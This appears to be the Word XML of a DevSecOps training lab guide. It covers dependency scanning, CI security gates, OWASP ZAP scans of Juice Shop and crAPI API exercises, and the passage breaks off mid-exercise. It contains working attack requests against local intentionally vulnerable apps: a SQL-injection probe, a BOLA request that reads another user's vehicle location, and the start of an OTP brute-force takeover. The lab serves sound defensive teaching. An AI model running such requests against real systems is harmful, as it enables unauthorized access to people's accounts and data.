        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scanned /path/to/requirements.txt</w:t>
        <w:br/>
        <w:t>Found 50 vulnerabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">  CRITICAL: 5  HIGH: 21  MEDIUM: 16  LOW: 2  UNKNOWN: 6</w:t>
        <w:br/>
        <w:br/>
        <w:t>Unique vs Trivy: GHSA-3ww4-gg4f-jr7f (cryptography, CVSS 8.7) — PYSEC database only</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF0F8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OSV vs Trivy:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OSV found 50 vulnerabilities vs Trivy's 43 for the same file. The 7 extra come from PYSEC (Python-specific) records not yet in Trivy's OSV feed. Run both for maximum coverage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.7  GitHub Actions CI Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The pipeline lives at .github/workflows/devsecops-pipeline.yml:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="595959"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  devsecops-pipeline.yml (excerpt)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Key jobs in the pipeline:</w:t>
        <w:br/>
        <w:t>jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bandit:   runs-on: ubuntu-latest → pip install bandit → bandit -r .</w:t>
        <w:br/>
        <w:t xml:space="preserve">  semgrep:  uses: returntocorp/semgrep-action@v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  trivy:    uses: aquasecurity/trivy-action@master</w:t>
        <w:br/>
        <w:t xml:space="preserve">  osv:      uses: google/osv-scanner-action@v1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BF8F00"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  GitHub Actions showing red (Semgrep, OSV failing):  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>This is EXPECTED and correct. The tools found real vulnerabilities and are blocking the build — that is the security gate working as designed. A green pipeline on a deliberately vulnerable app would mean the tools aren't working.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.8  Git Push — Path Confusion Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The repo root is 'DSO essentials/'. All git add paths are relative to this root.</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  ROADBLOCK — git add failing with 'pathspec did not match':  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>This happens when you run git add from inside a subdirectory. Always cd to the repo root first, then use paths relative to there.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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 WRONG — running git add from inside module-2-sast/</w:t>
        <w:br/>
        <w:t>git add docs/Module-2-Semgrep-SAST-Report.docx  # fails</w:t>
        <w:br/>
        <w:br/>
        <w:t># CORRECT — always cd to repo root first</w:t>
        <w:br/>
        <w:t>cd "DSO essentials"</w:t>
        <w:br/>
        <w:t>git status  # read the exact paths shown here</w:t>
        <w:br/>
        <w:t>git add devsecops-lab/docs/Module-2-Semgrep-SAST-Report.docx</w:t>
        <w:br/>
        <w:t>git commit -m "Module 2: add Semgrep SAST report"</w:t>
        <w:br/>
        <w:t>git push origin main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="6A1E8A"/>
        </w:rPr>
        <w:t>Module 3 — Dynamic Application Security Testing (DAST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DAST attacks a live running application with real HTTP payloads — confirming runtime exploitability, not just code patterns. Tool: OWASP ZAP 2.16.1. Target: Juice Shop running on http://localhost:3000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.1  Install OWASP ZAP</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brew install --cask owasp-zap</w:t>
        <w:br/>
        <w:t># Also install Firefox for Ajax Spider:</w:t>
        <w:br/>
        <w:t>brew install --cask firefox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Verify ZAP is installed by opening it from Applications or running:</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open -a OWASP\ ZAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.2  ZAP Baseline Scan (Docker — Passive Only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The baseline scan uses no attack payloads — safe for any target. It runs the ZAP spider and passive scanner only, taking ~2 minutes.</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  ROADBLOCK 1 — '/zap/wrk' not mounted:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>First run fails with: 'A file based option has been specified but the directory /zap/wrk is not mounted'. Fix: add the -v volume mount shown below.</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  ROADBLOCK 2 — localhost unreachable inside Docker on macOS:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Docker on macOS runs in a VM. 'localhost' inside the container cannot reach your Mac's localhost:3000. Fix: use host.docker.internal:3000 instead of localhost:3000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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mkdir -p /tmp/zap-reports</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker run --rm \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v /tmp/zap-reports:/zap/wrk:rw \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t http://host.docker.internal:3000 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -r zap-baseline-report.html</w:t>
        <w:br/>
        <w:br/>
        <w:t># Report saved to /tmp/zap-reports/zap-baseline-report.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>WARN-NEW: Content Security Policy (CSP) Header Not Set [10038]</w:t>
        <w:br/>
        <w:t>WARN-NEW: Cross-Domain Misconfiguration [10098]</w:t>
        <w:br/>
        <w:t>WARN-NEW: Missing Anti-clickjacking Header [10020]</w:t>
        <w:br/>
        <w:t>PASS: 42 passive rules passed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.3  ZAP Full Active Scan — Docker (arm64 / Apple Silicon)</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  ROADBLOCK — DomXSS scanner crashes on Apple Silicon:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The ZAP full scan Docker image tries to launch headless Firefox for DomXSS scanning. On arm64 (Apple Silicon), Firefox times out, ZAP's internal proxy drops, and the entire scan fails with: HTTPConnectionPool Max retries exceeded. The -config scanner.domxss.enabled=false flag does NOT prevent this crash. Fix: use the ZAP GUI natively on macOS instead of Docker for active scanning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.4  ZAP Full Active Scan — GUI (macOS native)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open ZAP GUI from Applications. Configure and run as follows:</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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>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Action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1</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Open ZAP → Tools → Options → Active Scan → ensure 'Policy' is set to Default</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2</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In the Quick Start tab: paste http://localhost:3000 → click Automated Scan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3</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Select 'Standard Scan' (not Ajax) for initial run to avoid Firefox dependency</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4</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Wait for scan to complete (~10-20 min). Watch the Alerts tab populate in real time</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5</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Report → Generate Report → HTML format → save to module-3-dast/zap-reports/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pP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  ROADBLOCK — 'Failed to start/connect to Firefox':  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ZAP GUI tries to launch Firefox for Ajax Spider. If Firefox is not installed: brew install --cask firefox. Alternatively, go to ZAP → Tools → Options → Selenium and switch to Chrome (Chrome is auto-detected if already installed).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5  ZAP Results — What to Look For</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Full scan of Juice Shop produced 10 alerts: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Severity</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Finding</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Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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/rest/products/search?q='(</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E26B0A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</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CSP Header Not Set</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 (main page + 4 URLs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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E26B0A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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CORS Wildcard (Access-Control-Allow-Origin: *)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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JS bundle endpoints</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E26B0A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</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Missing Anti-clickjacking Header</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socket.io POST endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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E26B0A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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Session ID in URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F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socket.io GET/POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SQL Injection — confirm the finding manually:</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curl -s "http://localhost:3000/rest/products/search?q=%27%28"</w:t>
        <w:br/>
        <w:t># Payload: '( (single-quote + open parenthesis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"error":{"message":"SQLITE_ERROR: near \"(\": syntax error","sql":"SELECT * FROM Products WHERE ((name LIKE '%'(%' OR ..."}}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF0F8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SAST vs DAST on this finding:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Semgrep (Module 2) flagged string-concatenated SQL as a code pattern. ZAP (Module 3) sent '( and got back the raw SQLite error — runtime confirmation. SAST gives root cause. DAST gives proof of exploitability. You need both.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Module 3.5 — API Security (OWASP API Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>API security testing against crAPI (Completely Ridiculous API) — an intentionally vulnerable vehicle management REST API maintained by OWASP. All testing done manually via curl — no GUI scanner needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.1  Deploy crAPI</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cd module-3.5-api-security</w:t>
        <w:br/>
        <w:br/>
        <w:t># Download docker-compose</w:t>
        <w:br/>
        <w:t>curl -o docker-compose.yml \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Pull images (~800 MB, takes 2-3 min)</w:t>
        <w:br/>
        <w:t>docker compose pull</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker compose up -d</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docker compose ps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>NAME                          STATUS</w:t>
        <w:br/>
        <w:t>api.mypremiumdealership.com   Up (healthy)</w:t>
        <w:br/>
        <w:t>crapi-community               Up (healthy)</w:t>
        <w:br/>
        <w:t>crapi-identity                Up (healthy)</w:t>
        <w:br/>
        <w:t>crapi-web                     Up (healthy)   127.0.0.1:8888-&gt;80/tcp</w:t>
        <w:br/>
        <w:t>crapi-workshop                Up (healthy)</w:t>
        <w:br/>
        <w:t>mailhog                       Up (healthy)   127.0.0.1:8025-&gt;8025/tcp</w:t>
        <w:br/>
        <w:t>mongodb                       Up (healthy)</w:t>
        <w:br/>
        <w:t>postgresdb                    Up (healthy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Services: UI → http://localhost:8888  |  Email → http://localhost:8025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.2  Register Two Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Register User 1 (admin@admin.com) and User 2 (admin2@admin.com) at http://localhost:8888. After each registration, open http://localhost:8025 (Mailhog) — click the verification email link to activate the account. Then add a vehicle via the Mailhog welcome email which contains a VIN and pincode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.3  Get Bearer Tokens</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 Login as User 1</w:t>
        <w:br/>
        <w:t>curl -s -X POST http://localhost:8888/identity/api/auth/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d '{"email":"admin@admin.com","password":"YourPassword"}' | python3 -m json.tool</w:t>
        <w:br/>
        <w:br/>
        <w:t># Save the token value as TOKEN1</w:t>
        <w:br/>
        <w:t>export TOKEN1="eyJhbG..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "token": "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbkBhZ...",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "type": "Bearer",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "message": "Login successful"</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.4  Exercise 1 — BOLA (API1:2023)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Broken Object Level Authorisation: use User 2's token to access User 1's vehicle location.</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 Step 1: get User 1's vehicle UUID</w:t>
        <w:br/>
        <w:t>curl -s http://localhost:8888/identity/api/v2/vehicle/vehicles \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN1" | python3 -m json.tool</w:t>
        <w:br/>
        <w:t># Note the uuid field e.g. fa977913-48b3-41a5-be75-1b847b1039d1</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 2: use User 2's token to access User 1's vehicle — ALL ONE LINE</w:t>
        <w:br/>
        <w:t>curl -s "http://localhost:8888/identity/api/v2/vehicle/&lt;USER1_UUID&gt;/location" -H "Authorization: Bearer $TOKEN2" | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "carId": "fa977913-48b3-41a5-be75-1b847b1039d1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "vehicleLocation": {"latitude": "37.406769", "longitude": "-94.705528"},</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fullName": "admin",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "email": "admin@admin.com"</w:t>
        <w:br/>
        <w:t>}</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  ROADBLOCK — 404 Not Found:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The endpoint is /identity/api/v2/vehicle/{uuid}/location — NOT /workshop/api/vehicle/. Getting 404 means the wrong base path was used.</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  ROADBLOCK — 401 Invalid Token (backslash line continuation issue):  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>When pasting a multi-line curl command (with \ at end of lines) as a single line, the \ stops being a line continuation and curl sends the request without the Authorization header. Always run curl commands as a single line with no backslash, or use the $TOKEN variable approach shown above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.5  Exercise 2 — OTP Brute Force (API4 + API9:2023)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No rate limiting on the legacy v2 endpoint enables full account takeover.</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 Step 1: trigger forgot-password OTP</w:t>
        <w:br/>
        <w:t>curl -s -X POST http://localhost:8888/identity/api/auth/forget-password \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d '{"email":"admin@admin.com"}' | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
